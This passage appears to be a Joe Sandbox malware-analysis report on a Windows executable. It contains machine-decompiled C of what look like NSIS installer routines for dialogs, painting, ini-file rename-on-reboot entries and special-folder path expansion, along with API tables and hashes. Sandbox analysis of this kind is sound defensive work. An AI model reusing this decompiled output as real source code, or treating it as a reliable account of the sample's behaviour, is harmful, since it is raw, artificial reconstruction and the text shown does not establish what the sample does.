							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00404485(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048AD();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x4291fc - 4 + _t75 * 4);
				}
				_t76 =  *0x42a258 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E004045D3;
				if(_t110 != 2) {
					_v8 = E00404599;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404463(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404463(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00404485( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E00404498(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a230 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x4216d4 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x4216d4 = 0;
				return 0;
			}

0x00404634
0x00404761
0x004047be
0x004047c2
0x0040488f
0x00404891
0x00404891
0x00404897
0x00404897
0x0040489a
0x00000000
0x004048a1
0x004047d0
0x004047d6
0x004047e0
0x004047eb
0x004047ee
0x004047f1
0x004047fc
0x004047ff
0x00404806
0x00404813
0x00404824
0x0040482a
0x00404832
0x00404840
0x00404846
0x00404846
0x00404806
0x00404850
0x00000000
0x0040485b
0x0040485f
0x0040486f
0x0040486f
0x00404875
0x00404881
0x00404881
0x00000000
0x00404885
0x00404850
0x0040476c
0x00000000
0x0040477e
0x0040477e
0x00404783
0x00404783
0x00404789
0x00000000
0x00000000
0x004047b2
0x004047b4
0x004047b9
0x00000000
0x004047b9
0x0040476c
0x0040463a
0x0040463d
0x00404642
0x00404653
0x00404653
0x0040465b
0x0040465e
0x00404662
0x00404665
0x00404669
0x0040466c
0x0040466f
0x00404672
0x00404679
0x0040467b
0x0040467b
0x00404685
0x00404692
0x0040469c
0x004046a1
0x004046a4
0x004046a9
0x004046c0
0x004046c7
0x004046da
0x004046dd
0x004046f1
0x004046f8
0x004046fd
0x00404702
0x00404702
0x00404710
0x0040471e
0x00404730
0x00404735
0x00404745
0x00404747
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046C0
GetDlgItem.USER32(?,000003E8), ref: 004046D4
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004046F1
GetSysColor.USER32(?), ref: 00404702
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404710
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040471E
lstrlenW.KERNEL32(?), ref: 00404723
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404730
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404745
GetDlgItem.USER32(?,0000040A), ref: 0040479E
SendMessageW.USER32(00000000), ref: 004047A5
GetDlgItem.USER32(?,000003E8), ref: 004047D0
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404813
LoadCursorW.USER32(00000000,00007F02), ref: 00404821
SetCursor.USER32(00000000), ref: 00404824
LoadCursorW.USER32(00000000,00007F00), ref: 0040483D
SetCursor.USER32(00000000), ref: 00404840
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040486F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404881

Strings

N, xrefs: 004047BE
Call, xrefs: 004047FF

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
Instruction ID: bd26b540472948519bfd0c296b0258925a36bd111cdc3ec084d9598cfd27fd02
Opcode Fuzzy Hash: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
Instruction Fuzzy Hash: A16180B1900209FFDB10AF61DD85AAA7B69FB84314F00853AFA05B62D1C7789D61CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a230;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429220, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a228;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
Instruction ID: ce1ac2179a7edcd12a9bbec6f3b07c603adbad34dac6b1105353c89659c02e28
Opcode Fuzzy Hash: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
Instruction Fuzzy Hash: 63417B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0CB74DA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040614D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040614D(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426da8 = 0x55004e;
				 *0x426dac = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x4275a8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269a8, "%ls=%ls\r\n", 0x426da8, 0x4275a8);
						_t53 = _t52 + 0x10;
						E00406544(_t37, 0x400, 0x4275a8, 0x4275a8,  *((intOrPtr*)( *0x42a230 + 0x128)));
						_t12 = E00405FF7(0x4275a8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E0040607A(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F5C(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F5C(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FB2(_t24 + _t46, 0x4269a8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060A9(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405FF7(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426da8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x0040614d
0x00406156
0x0040615d
0x00406167
0x0040617b
0x004061a3
0x004061ae
0x004061b2
0x004061d2
0x004061d9
0x004061e3
0x004061f0
0x004061f5
0x004061fa
0x004061fe
0x0040620d
0x0040620f
0x0040621c
0x00406220
0x004062bb
0x00000000
0x00406236
0x00406243
0x00406267
0x0040626b
0x0040628a
0x0040628e
0x0040628e
0x00406290
0x00406299
0x004062a4
0x004062af
0x004062b5
0x00000000
0x004062b5
0x0040626d
0x00406270
0x0040627b
0x00406277
0x00406279
0x0040627a
0x0040627a
0x00406282
0x00406284
0x00000000
0x00406284
0x0040624e
0x00406254
0x00000000
0x00406254
0x00406220
0x004061fe
0x0040617d
0x00406188
0x00406191
0x00406195
0x00000000
0x00000000
0x00406195
0x004062c6

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062E8,?,?), ref: 00406188
GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 00406191

Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E

GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 004061AE
wsprintfA.USER32 ref: 004061CC
GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 00406207
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406216
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040624E
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062A4
GlobalFree.KERNEL32(00000000), ref: 004062B5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062BC

Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\file.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D

Strings

[Rename], xrefs: 00406236, 00406248
%ls=%ls, xrefs: 004061C2

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 103a52d89d2190fa92995d585e71df630d47c1fe56f755659e2bb6cae3d098e7
Instruction ID: ee14a5085299e91e75cde0480e6b7733258fb9cdf367bc6c01a907801337673b
Opcode Fuzzy Hash: 103a52d89d2190fa92995d585e71df630d47c1fe56f755659e2bb6cae3d098e7
Instruction Fuzzy Hash: 03312130201715BFD2207B619D48F2B3AACEF41718F16007EBD42F62C2DE3C982586AD

Uniqueness

Uniqueness Score: -1.00%

Function 00406544 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00406544(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x4291fc - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a258 + _t44 * 2;
				_t45 = 0x4281c0;
				_t108 = 0x4281c0;
				if(_a4 >= 0x4281c0 && _a4 - 0x4281c0 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406507(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E00406544(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x4281c0;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406507(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E0040644E(_t108,  *0x42a228);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E0040678E(_t108);
							}
							goto L38;
						}
						if( *0x42a2a4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a224;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a228,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a228,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E004063D5( *0x42a258, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a258 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E00406544(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

0x00406544
0x00406544
0x00406544
0x0040654a
0x0040654f
0x00406560
0x00406560
0x00406568
0x00406569
0x0040656a
0x0040656b
0x0040656e
0x00406576
0x00406578
0x00406589
0x0040658c
0x0040658c
0x00406590
0x00406596
0x00406599
0x00406774
0x00406774
0x0040677f
0x0040678b
0x0040678b
0x00000000
0x0040659f
0x004065a4
0x004065b9
0x004065ba
0x004065c0
0x00406752
0x00406760
0x00406763
0x00406763
0x00406754
0x00406757
0x0040675a
0x0040675c
0x0040675c
0x00406765
0x00406765
0x0040676b
0x0040676e
0x004065a1
0x00000000
0x004065a1
0x00000000
0x0040676e
0x004065c6
0x004065c9
0x004065d8
0x004065df
0x004065eb
0x004065ee
0x004065f1
0x004065f2
0x004065f7
0x004065fd
0x00406600
0x00406603
0x004066f6
0x004066fb
0x0040672e
0x00406733
0x00406738
0x0040673d
0x0040673d
0x00406742
0x00406748
0x0040674b
0x00000000
0x0040674b
0x004066fd
0x00406700
0x00406703
0x00406718
0x0040671f
0x00406705
0x0040670c
0x0040670c
0x00406727
0x0040672a
0x004066ee
0x004066ef
0x004066ef
0x00000000
0x0040672a
0x00406610
0x00406614
0x00406614
0x00406615
0x00406617
0x00406654
0x00406657
0x00406667
0x0040666a
0x00406672
0x00406678
0x00406678
0x004066d3
0x004066d3
0x004066d5
0x00000000
0x00000000
0x0040667c
0x00406681
0x00406682
0x00406684
0x0040669b
0x004066a9
0x004066af
0x004066b1
0x004066cf
0x004066cf
0x004066cf
0x00000000
0x004066cf
0x004066b7
0x004066c0
0x004066c3
0x004066c9
0x004066cd
0x00000000
0x00000000
0x00000000
0x004066cd
0x00406695
0x00406697
0x00406699
0x00000000
0x00000000
0x00000000
0x00406699
0x00000000
0x004066d3
0x0040665f
0x00000000
0x00406619
0x00406637
0x00406640
0x004066dd
0x004066e1
0x004066e9
0x004066e9
0x00000000
0x004066e1
0x0040664a
0x004066d7
0x004066db
0x00000000
0x00000000
0x00000000
0x004066db
0x00406617
0x00000000
0x004065a4

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040665F
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,00000000,00000000,00418EC0,00000000), ref: 00406672
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,00000000), ref: 00406743

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040662D
Call, xrefs: 0040656E, 00406621, 00406628, 0040662C, 00406649, 0040665E, 00406671, 00406686, 004066B3, 004066E8, 004066EE, 0040670B, 0040671E, 0040673C, 00406742, 0040674B, 00406781
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004066E3
Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll, xrefs: 00406569

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-2325976283
Opcode ID: c443ed2fe3bb0bf6a7f47d91466dd90616c2d01c1c672cece4f8c154340eecc2
Instruction ID: a0e829acba6452fa9eccf544198c9fcc7de98ae724d9d0e98a153b46e40356ac
Opcode Fuzzy Hash: c443ed2fe3bb0bf6a7f47d91466dd90616c2d01c1c672cece4f8c154340eecc2
Instruction Fuzzy Hash: 5261E371A00215ABDB209F64DC40AAE37A5EF44318F11813AE957B72D0D77E8AA1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004044CA Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044CA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
